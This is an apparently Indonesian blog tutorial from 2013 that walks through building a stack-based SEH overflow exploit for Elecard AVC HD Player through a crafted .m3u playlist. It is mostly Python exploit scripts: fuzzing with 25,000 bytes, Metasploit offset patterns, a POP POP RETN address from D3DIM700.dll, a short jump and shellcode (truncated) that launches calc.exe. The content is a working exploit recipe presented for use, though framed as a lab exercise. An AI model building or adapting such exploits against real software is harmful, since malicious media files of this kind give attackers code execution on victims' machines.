Jumat, 18 Januari 2013

Stack-based Overflow on 'Elecard AVC HD Player'

Things that need to prepare are:
1. windows xp 3 (in virtual box)
2. Elecard player application, which is installed in windows)
2. Olly dbg (who already installed on windows)
3. understand the language python (here the user is using a back track 5)


First, prepare  the fuzzingFirst, prepare  the fuzzing 
#!usr/bin/python
file="crash1.m3u"
head="#EXTM3U\n"
head+="#EXTINF:153,Artist - song\n"
dead="\x41" * 25000
file=open(file,'w')
file.write(head+dead)
print"Succesfully Created File ..."
file.close()


Now, Let's Run Elecard AVC HD Player

then, open OllyDbg and Attach Elecard AVC HD Player applications. Choose Mpeg Player

Run a fuzzer. And see the result.
To see the results, select the tab view - SEH Chain. And The result is


Next, try to make the pattern of 25000 byte through # pattern_create
root@bt:/opt/metasploit/msf3/tools# ./pattern_create.rb 25000

then, insert into fuzzer
#!usr/bin/python
file="crash2.m3u"
head="#EXTM3U\n"
head+="#EXTINF:153,Artist - song\n"
dead="Aa0Aa1Aa . .
"
file=open(file,'w')
file.write(head+dead)
print"Succesfully Created File ..."
file.close()


after that try restarting OllyDbg and Electra. Rerun the fuzzer. So the result

after the result has been that we can, try to insert into # pattern_offset
root@bt:/opt/metasploit/msf3/tools# ./pattern_offset.rb 33614132
8

Let's try modification the fuzzer to check
#!usr/bin/python
file="crash3.m3u"
head="#EXTM3U\n"
head+="#EXTINF:153,Artist - song\n"
dead ="\x90" * 4
dead+="\xBB\xBB\xBB\xBB"
dead+="\x90" * (25000 - len(dead))
file=open(file,'w')
file.write(head+dead)
print"Succesfully Created File ..."
file.close()

the resullt

further to find the module click menu view select Executable modules.
then all modules will appear., here users D3DIM700.dll use of modules. double click on the module.
after getting into the window of the file D3DIM700.dll CPU. search for right click -> sequence commands. fill in as below. and click find


Olly dbg will point to a memory address in the file that has a series of commands D3DIM700.dll POP, POP, RETN.
Now we've got that to offset 7394A0A6.

insert into fuzzer
#!usr/bin/python
file="crash3.m3u"
head="#EXTM3U\n"
head+="#EXTINF:153,Artist - song\n"
dead ="\x90" * 4
dead+="\xcc\xcc\xcc\xcc"
dead+="\xA6\xA0\x94\x73" #address on D3DIM700.dll
dead+="\x90" * (22000 - len(dead))
file=open(file,'w')
file.write(head+dead)
print"Succesfully Created File ..."
file.close()

we have successfully executed D3DIM700.dll module did break point by pressing F2. 

The next press shif + F9.
olly dbg will then continue the process into memory. look on the left olly dbg look we have managed to do a command POP, POP, RETN.
problem that arises is that there are only a memory space of 5 bytes only. 5byte not enough to save the shell code


Try Modification the fuzzer
#!usr/bin/python
file="crash3.m3u"
head="#EXTM3U\n"
head+="#EXTINF:153,Artist - song\n"
dead ="\x90" * 4
dead+="\xeb\x06\x90\x90"
dead+="\xA6\xA0\x94\x73" #address on D3DIM700.dll
dead+="\x90" * (22000 - len(dead))
file=open(file,'w')
file.write(head+dead)
print"Succesfully Created File ..."
file.close()

The next step we create shell code., open your terminal and follow the commands as shown below:


copy the ip address into your web browser. it will appear as shown below


after click generate., insert the payload into the fuzzer.
#!usr/bin/python
file="crashcalc.m3u"
head="#EXTM3U\n"
head+="#EXTINF:153,Artist - song\n"
dead ="\x90" * 4
dead+="\xeb\x06\x90\x90" #JMP SHORT
dead+="\xA6\xA0\x94\x73" #address on D3DIM700.dll
dead+="\x90" * 16
dead+=("\x29\xc9\x83\xe9\xde . .) # Calc.exe
dead+="\x90" * (25000 - len(dead))
file=open(file,'w')
file.write(head+dead)
print"Succesfully Created File ..."
file.close()

Now, try open Elecard AVC HD Player without Ollydbg and run the fuzzer.
Look what happen???
Elecard AVC HD Player Be a Calculator :-)

Good Luck !!!

0 komentar:

Posting Komentar